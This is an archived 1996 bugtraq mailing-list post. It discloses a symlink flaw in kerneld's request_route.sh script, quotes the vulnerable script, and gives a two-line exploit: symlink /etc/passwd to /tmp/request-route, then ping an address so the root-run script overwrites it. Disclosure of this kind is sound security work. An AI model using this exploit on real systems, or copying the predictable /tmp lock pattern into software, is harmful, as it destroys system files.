[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [linux-security] Big security hole in kerneld's request_route
From: "Igor Chudov () home" <ichudov () algebra ! com>
Date: 1996-06-13 17:51:57
[Download RAW message or body]
-----BEGIN PGP SIGNED MESSAGE-----
Hi,
I was just looking at sources of newly released linux 2.0.
In modules-1.3.69k, in kerneld's subdirectory, there is a file
request_route.sh (see below). It's supposed to run as root, whenever
a route is requested. It is supposed to start pppd or something like
that.
As it appears, it is possible to destroy system philes (such as /etc/passwd
and so on).
Condition: you must have a system which has "on-demand loading" of pppd,
whenever a route is requested.
Exploit:
you $ ln -s /etc/passwd /tmp/request-route
you$ ping 204.251.80.30
Internally kerneld starts request_route, request_route writes pid
to the symlinked file, and the file pointed to by symlink is overwritten.
Did I miss something?
- Igor.
#! /bin/sh
LOCK=/tmp/request-route
PATH=/usr/sbin:$PATH # for ppp-2.2*
export PATH
# Note: you are _not_ forced to use ppp!
# You can do whatever you want in order to satisfy the kernel route request.
# It might be a good idea to set up the route as the default route, in case
# you are using e.g. slip or plip or any other net driver...
#
# This script will be called from kerneld with the requested route as $1
# Create a chat script for your nameserver (as defined in /etc/resolv.conf)
#
chatfile=/etc/ppp/chat.$1
if [ -f $chatfile ]
then
#
# Tune your favourite parameters to pppd, including the idle-disconnect option.
# Kerneld will be automatically triggered to load slhc.o and ppp.o
#
pppd connect "chat -f $chatfile" /dev/modem 38400 \
idle-disconnect 600 modem defaultroute noipdefault \
& # let pppd detach itself whenever it wants to...
#
# Timer to be killed by ip-up, tunable! Check kerneld delay as well
#
sleep 60 &
sleepid=$!
echo $sleepid > $LOCK
wait $sleepid
rm -f $LOCK
exit 0
else
exit 1
fi
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMb+XDMJFmFyXKPzRAQHLzwP9HAD/WCkirGpBUjLXIdcmhQcQMf3eJMDk
Y5tU/7KkXR2afOmEncZEQs57FOhHaVtDiAMZ0B25Dn0ef6qhbYSS3wjzjh2V8m0d
OHxnoRHTSApM1mQA2WFPYkzfqmFHXzQBHur6xNkl6JcJ9FiLFSQp3cQBjgcafX0C
CaDXkJNTNSI=
=8zfD
-----END PGP SIGNATURE-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic